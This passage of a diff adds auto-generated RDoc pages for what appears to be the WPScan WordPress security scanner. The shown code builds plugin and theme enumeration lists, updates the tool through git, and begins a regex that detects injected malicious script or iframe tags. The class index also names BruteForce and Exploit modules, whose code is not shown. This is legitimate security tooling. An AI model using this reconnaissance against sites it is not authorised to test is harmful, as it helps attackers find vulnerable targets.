<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="class">Generate_List</h1>
<div id="description" class="description">
<p>This tool generates a list to use for plugin and theme enumeration</p>
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Attributes -->
<div id="attribute-method-details" class="method-section section">
<h3 class="section-header">Attributes</h3>
<div id="verbose-attribute-method" class="method-detail">
<a name="verbose"></a>
<a name="verbose="></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">verbose</span><span
class="attribute-access-type">[RW]</span>
</div>
<div class="method-description">
</div>
</div>
</div><!-- attribute-method-details -->
<!-- Methods -->
<div id="public-class-method-details" class="method-section section">
<h3 class="section-header">Public Class Methods</h3>
<div id="new-method" class="method-detail ">
<a name="method-c-new"></a>
<div class="method-heading">
<span class="method-name">new</span><span
class="method-args">(type, verbose)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>type = themes | plugins</p>
<div class="method-source-code" id="new-source">
<pre>
<span class="ruby-comment"># File lib/wpstools/generate_list.rb, line 27</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">initialize</span>(<span class="ruby-identifier">type</span>, <span class="ruby-identifier">verbose</span>)
<span class="ruby-keyword">if</span> <span class="ruby-identifier">type</span> <span class="ruby-operator">=~</span> <span class="ruby-regexp">/plugins/</span>
<span class="ruby-ivar">@type</span> = <span class="ruby-string">&quot;plugin&quot;</span>
<span class="ruby-ivar">@svn_url</span> = <span class="ruby-string">'http://plugins.svn.wordpress.org/'</span>
<span class="ruby-ivar">@file_name</span> = <span class="ruby-constant">DATA_DIR</span> <span class="ruby-operator">+</span> <span class="ruby-string">'/plugins.txt'</span>
<span class="ruby-ivar">@popular_url</span> = <span class="ruby-string">'http://wordpress.org/extend/plugins/browse/popular/'</span>
<span class="ruby-ivar">@popular_regex</span> = <span class="ruby-regexp">%{&lt;h3&gt;&lt;a href=&quot;http://wordpress.org/extend/plugins/(.+)/&quot;&gt;.+&lt;/a&gt;&lt;/h3&gt;}</span>
<span class="ruby-keyword">elsif</span> <span class="ruby-identifier">type</span> <span class="ruby-operator">=~</span> <span class="ruby-regexp">/themes/</span>
<span class="ruby-ivar">@type</span> = <span class="ruby-string">&quot;theme&quot;</span>
<span class="ruby-ivar">@svn_url</span> = <span class="ruby-string">'http://themes.svn.wordpress.org/'</span>
<span class="ruby-ivar">@file_name</span> = <span class="ruby-constant">DATA_DIR</span> <span class="ruby-operator">+</span> <span class="ruby-string">'/themes.txt'</span>
<span class="ruby-ivar">@popular_url</span> = <span class="ruby-string">'http://wordpress.org/extend/themes/browse/popular/'</span>
<span class="ruby-ivar">@popular_regex</span> = <span class="ruby-regexp">%{&lt;h3&gt;&lt;a href=&quot;http://wordpress.org/extend/themes/(.+)&quot;&gt;.+&lt;/a&gt;&lt;/h3&gt;}</span>
<span class="ruby-keyword">else</span>
<span class="ruby-identifier">raise</span> <span class="ruby-node">&quot;Type #{type} not defined&quot;</span>
<span class="ruby-keyword">end</span>
<span class="ruby-ivar">@verbose</span> = <span class="ruby-identifier">verbose</span>
<span class="ruby-ivar">@browser</span> = <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>
<span class="ruby-ivar">@hydra</span> = <span class="ruby-ivar">@browser</span>.<span class="ruby-identifier">hydra</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- new-source -->
</div>
</div><!-- new-method -->
</div><!-- public-class-method-details -->
<div id="public-instance-method-details" class="method-section section">
<h3 class="section-header">Public Instance Methods</h3>
<div id="generate_full_list-method" class="method-detail ">
<a name="method-i-generate_full_list"></a>
<div class="method-heading">
<span class="method-name">generate_full_list</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="generate_full_list-source">
<pre>
<span class="ruby-comment"># File lib/wpstools/generate_list.rb, line 48</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">generate_full_list</span>
<span class="ruby-identifier">items</span> = <span class="ruby-constant">Svn_Parser</span>.<span class="ruby-identifier">new</span>(<span class="ruby-ivar">@svn_url</span>, <span class="ruby-ivar">@verbose</span>).<span class="ruby-identifier">parse</span>
<span class="ruby-identifier">save</span> <span class="ruby-identifier">items</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- generate_full_list-source -->
</div>
</div><!-- generate_full_list-method -->
<div id="generate_popular_list-method" class="method-detail ">
<a name="method-i-generate_popular_list"></a>
<div class="method-heading">
<span class="method-name">generate_popular_list</span><span
class="method-args">(pages)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="generate_popular_list-source">
<pre>
<span class="ruby-comment"># File lib/wpstools/generate_list.rb, line 53</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">generate_popular_list</span>(<span class="ruby-identifier">pages</span>)
<span class="ruby-identifier">popular</span> = <span class="ruby-identifier">get_popular_items</span>(<span class="ruby-identifier">pages</span>)
<span class="ruby-identifier">items</span> = <span class="ruby-constant">Svn_Parser</span>.<span class="ruby-identifier">new</span>(<span class="ruby-ivar">@svn_url</span>, <span class="ruby-ivar">@verbose</span>).<span class="ruby-identifier">parse</span>(<span class="ruby-identifier">popular</span>)
<span class="ruby-identifier">save</span> <span class="ruby-identifier">items</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- generate_popular_list-source -->
</div>
</div><!-- generate_popular_list-method -->
<div id="get_popular_items-method" class="method-detail ">
<a name="method-i-get_popular_items"></a>
<div class="method-heading">
<span class="method-name">get_popular_items</span><span
class="method-args">(pages)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Send a HTTP request to the WordPress most popular theme or plugin webpage
parse the response for the names.</p>
<div class="method-source-code" id="get_popular_items-source">
<pre>
<span class="ruby-comment"># File lib/wpstools/generate_list.rb, line 62</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">get_popular_items</span>(<span class="ruby-identifier">pages</span>)
<span class="ruby-identifier">found_items</span> = []
<span class="ruby-identifier">page_count</span> = <span class="ruby-value">1</span>
<span class="ruby-identifier">queue_count</span> = <span class="ruby-value">0</span>
(<span class="ruby-value">1</span><span class="ruby-operator">...</span>(<span class="ruby-identifier">pages</span>.<span class="ruby-identifier">to_i</span><span class="ruby-operator">+</span><span class="ruby-value">1</span>)).<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">page</span><span class="ruby-operator">|</span>
<span class="ruby-comment"># First page has another URL</span>
<span class="ruby-identifier">url</span> = (<span class="ruby-identifier">page</span> <span class="ruby-operator">==</span> <span class="ruby-value">1</span>) <span class="ruby-operator">?</span> <span class="ruby-ivar">@popular_url</span> <span class="ruby-operator">:</span> <span class="ruby-ivar">@popular_url</span> <span class="ruby-operator">+</span> <span class="ruby-string">'page/'</span> <span class="ruby-operator">+</span> <span class="ruby-identifier">page</span>.<span class="ruby-identifier">to_s</span> <span class="ruby-operator">+</span> <span class="ruby-string">'/'</span>
<span class="ruby-identifier">request</span> = <span class="ruby-ivar">@browser</span>.<span class="ruby-identifier">forge_request</span>(<span class="ruby-identifier">url</span>)
<span class="ruby-identifier">queue_count</span> <span class="ruby-operator">+=</span> <span class="ruby-value">1</span>
<span class="ruby-identifier">request</span>.<span class="ruby-identifier">on_complete</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">response</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;[+] Parsing page &quot;</span> <span class="ruby-operator">+</span> <span class="ruby-identifier">page_count</span>.<span class="ruby-identifier">to_s</span> <span class="ruby-keyword">if</span> <span class="ruby-ivar">@verbose</span>
<span class="ruby-identifier">page_count</span> <span class="ruby-operator">+=</span> <span class="ruby-value">1</span>
<span class="ruby-identifier">response</span>.<span class="ruby-identifier">body</span>.<span class="ruby-identifier">scan</span>(<span class="ruby-ivar">@popular_regex</span>).<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">item</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">puts</span> <span class="ruby-node">&quot;[+] Found popular #{@type}: #{item}&quot;</span> <span class="ruby-keyword">if</span> <span class="ruby-ivar">@verbose</span>
<span class="ruby-identifier">found_items</span> <span class="ruby-operator">&lt;&lt;</span> <span class="ruby-identifier">item</span>[<span class="ruby-value">0</span>]
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-ivar">@hydra</span>.<span class="ruby-identifier">queue</span>(<span class="ruby-identifier">request</span>)
<span class="ruby-keyword">if</span> <span class="ruby-identifier">queue_count</span> <span class="ruby-operator">==</span> <span class="ruby-ivar">@browser</span>.<span class="ruby-identifier">max_threads</span>
<span class="ruby-ivar">@hydra</span>.<span class="ruby-identifier">run</span>
<span class="ruby-identifier">queue_count</span> = <span class="ruby-value">0</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-ivar">@hydra</span>.<span class="ruby-identifier">run</span>
<span class="ruby-identifier">found_items</span>.<span class="ruby-identifier">sort!</span>
<span class="ruby-identifier">found_items</span>.<span class="ruby-identifier">uniq</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- get_popular_items-source -->
</div>
</div><!-- get_popular_items-method -->
<div id="save-method" class="method-detail ">
<a name="method-i-save"></a>
<div class="method-heading">
<span class="method-name">save</span><span
class="method-args">(items)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Save the file</p>
<div class="method-source-code" id="save-source">
<pre>
<span class="ruby-comment"># File lib/wpstools/generate_list.rb, line 99</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">save</span>(<span class="ruby-identifier">items</span>)
<span class="ruby-identifier">items</span>.<span class="ruby-identifier">sort!</span>
<span class="ruby-identifier">items</span>.<span class="ruby-identifier">uniq!</span>
<span class="ruby-identifier">puts</span> <span class="ruby-node">&quot;[*] We have parsed #{items.length} #{@type}s&quot;</span>
<span class="ruby-constant">File</span>.<span class="ruby-identifier">open</span>(<span class="ruby-ivar">@file_name</span>, <span class="ruby-string">'w'</span>) { <span class="ruby-operator">|</span><span class="ruby-identifier">f</span><span class="ruby-operator">|</span> <span class="ruby-identifier">f</span>.<span class="ruby-identifier">puts</span>(<span class="ruby-identifier">items</span>) }
<span class="ruby-identifier">puts</span> <span class="ruby-node">&quot;New #{@file_name} file created&quot;</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- save-source -->
</div>
</div><!-- save-method -->
</div><!-- public-instance-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

375
doc/GitUpdater.html Normal file
View File

@@ -0,0 +1,375 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Class: GitUpdater</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="class">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/updater/git_updater_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/updater/git_updater.rb">lib/updater/git_updater.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Parent Class -->
<div id="parent-class-section" class="section">
<h3 class="section-header">Parent</h3>
<p class="link"><a href="Updater.html">Updater</a></p>
</div>
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-i-is_installed-3F">#is_installed?</a></li>
<li><a href="#method-i-local_revision_number">#local_revision_number</a></li>
<li><a href="#method-i-repo_directory_arguments">#repo_directory_arguments</a></li>
<li><a href="#method-i-update">#update</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="class">GitUpdater</h1>
<div id="description" class="description">
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Methods -->
<div id="public-instance-method-details" class="method-section section">
<h3 class="section-header">Public Instance Methods</h3>
<div id="is_installed-3F-method" class="method-detail ">
<a name="method-i-is_installed-3F"></a>
<div class="method-heading">
<span class="method-name">is_installed?</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="is_installed-3F-source">
<pre>
<span class="ruby-comment"># File lib/updater/git_updater.rb, line 23</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">is_installed?</span>
<span class="ruby-node">%[git #{repo_directory_arguments()} status 2&gt;&amp;1]</span> <span class="ruby-operator">=~</span> <span class="ruby-regexp">/On branch/</span> <span class="ruby-operator">?</span> <span class="ruby-keyword">true</span> <span class="ruby-operator">:</span> <span class="ruby-keyword">false</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- is_installed-3F-source -->
</div>
</div><!-- is_installed-3F-method -->
<div id="local_revision_number-method" class="method-detail ">
<a name="method-i-local_revision_number"></a>
<div class="method-heading">
<span class="method-name">local_revision_number</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Git has not a revsion number like SVN, so we will take the 7 first chars of
the last commit hash</p>
<div class="method-source-code" id="local_revision_number-source">
<pre>
<span class="ruby-comment"># File lib/updater/git_updater.rb, line 28</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">local_revision_number</span>
<span class="ruby-identifier">git_log</span> = <span class="ruby-node">%[git #{repo_directory_arguments()} log -1 2&gt;&amp;1]</span>
<span class="ruby-identifier">git_log</span>[<span class="ruby-regexp">/commit ([0-9a-z]{7})/</span>, <span class="ruby-value">1</span>].<span class="ruby-identifier">to_s</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- local_revision_number-source -->
</div>
</div><!-- local_revision_number-method -->
<div id="update-method" class="method-detail ">
<a name="method-i-update"></a>
<div class="method-heading">
<span class="method-name">update</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="update-source">
<pre>
<span class="ruby-comment"># File lib/updater/git_updater.rb, line 33</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">update</span>
<span class="ruby-node">%[git #{repo_directory_arguments()} pull]</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- update-source -->
</div>
</div><!-- update-method -->
</div><!-- public-instance-method-details -->
<div id="protected-instance-method-details" class="method-section section">
<h3 class="section-header">Protected Instance Methods</h3>
<div id="repo_directory_arguments-method" class="method-detail ">
<a name="method-i-repo_directory_arguments"></a>
<div class="method-heading">
<span class="method-name">repo_directory_arguments</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="repo_directory_arguments-source">
<pre>
<span class="ruby-comment"># File lib/updater/git_updater.rb, line 38</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">repo_directory_arguments</span>
<span class="ruby-keyword">if</span> <span class="ruby-ivar">@repo_directory</span>
<span class="ruby-keyword">return</span> <span class="ruby-node">&quot;--git-dir=\&quot;#{@repo_directory}/.git\&quot; --work-tree=\&quot;#{@repo_directory}\&quot;&quot;</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- repo_directory_arguments-source -->
</div>
</div><!-- repo_directory_arguments-method -->
</div><!-- protected-instance-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

384
doc/Malwares.html Normal file
View File

@@ -0,0 +1,384 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Module: Malwares</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="module">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/wpscan/modules/malwares_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/wpscan/modules/malwares.rb">lib/wpscan/modules/malwares.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-c-malware_pattern">::malware_pattern</a></li>
<li><a href="#method-c-malwares_file">::malwares_file</a></li>
<li><a href="#method-i-has_malwares-3F">#has_malwares?</a></li>
<li><a href="#method-i-malwares">#malwares</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="module">Malwares</h1>
<div id="description" class="description">
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Methods -->
<div id="public-class-method-details" class="method-section section">
<h3 class="section-header">Public Class Methods</h3>
<div id="malware_pattern-method" class="method-detail ">
<a name="method-c-malware_pattern"></a>
<div class="method-heading">
<span class="method-name">malware_pattern</span><span
class="method-args">(url_regex)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="malware_pattern-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/modules/malwares.rb, line 56</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">malware_pattern</span>(<span class="ruby-identifier">url_regex</span>)
<span class="ruby-comment"># no need to escape regex here, because malware.txt contains regex</span>
<span class="ruby-node">%{&lt;(?:script|iframe).* src=(?:&quot;|')(#{url_regex}[^&quot;']*)(?:&quot;|')[^&gt;]*&gt;}</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- malware_pattern-source -->
</div>
</div><!-- malware_pattern-method -->
<div id="malwares_file-method" class="method-detail ">
<a name="method-c-malwares_file"></a>
<div class="method-heading">
<span class="method-name">malwares_file</span><span
class="method-args">(malwares_file_path)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="malwares_file-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/modules/malwares.rb, line 52</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">malwares_file</span>(<span class="ruby-identifier">malwares_file_path</span>)
<span class="ruby-identifier">malwares_file_path</span> <span class="ruby-operator">||</span> <span class="ruby-constant">DATA_DIR</span> <span class="ruby-operator">+</span> <span class="ruby-string">'/malwares.txt'</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- malwares_file-source -->
</div>
</div><!-- malwares_file-method -->
</div><!-- public-class-method-details -->
<div id="public-instance-method-details" class="method-section section">
<h3 class="section-header">Public Instance Methods</h3>
<div id="has_malwares-3F-method" class="method-detail ">
<a name="method-i-has_malwares-3F"></a>
<div class="method-heading">
<span class="method-name">has_malwares?</span><span
class="method-args">(malwares_file_path = nil)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="has_malwares-3F-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/modules/malwares.rb, line 23</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">has_malwares?</span>(<span class="ruby-identifier">malwares_file_path</span> = <span class="ruby-keyword">nil</span>)
<span class="ruby-operator">!</span><span class="ruby-identifier">malwares</span>(<span class="ruby-identifier">malwares_file_path</span>).<span class="ruby-identifier">empty?</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- has_malwares-3F-source -->
</div>
</div><!-- has_malwares-3F-method -->
<div id="malwares-method" class="method-detail ">
<a name="method-i-malwares"></a>
<div class="method-heading">
<span class="method-name">malwares</span><span
class="method-args">(malwares_file_path = nil)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>return array of string (url of malwares found)</p>
<div class="method-source-code" id="malwares-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/modules/malwares.rb, line 28</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">malwares</span>(<span class="ruby-identifier">malwares_file_path</span> = <span class="ruby-keyword">nil</span>)
